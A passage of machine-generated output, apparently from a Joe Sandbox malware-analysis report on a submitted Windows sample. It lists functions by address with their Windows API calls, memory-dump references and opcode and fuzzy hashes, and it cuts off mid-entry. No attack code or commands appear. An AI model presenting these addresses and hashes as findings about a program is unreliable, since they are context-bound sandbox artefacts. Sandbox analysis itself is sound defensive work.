                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1871949834-0
                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                        Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                        Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 3611059338-0
                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                        Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                        • String ID:
                                                                        • API String ID: 1640429340-0
                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                        Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 3632110297-0
                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                        Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 752480666-0
                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                        Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                        Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                        • String ID:
                                                                        • API String ID: 3275902921-0
                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                        Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                        Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                        • String ID:
                                                                        • API String ID: 3691411573-0
                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                        Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                        • String ID:
                                                                        • API String ID: 372113273-0
                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                        Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                        Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                        • __lock.LIBCMT ref: 004170BE
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                        • _free.LIBCMT ref: 004170EE
                                                                        • InterlockedIncrement.KERNEL32(02F32D00), ref: 00417106
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                        • String ID:
                                                                        • API String ID: 3470314060-0
                                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                        Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
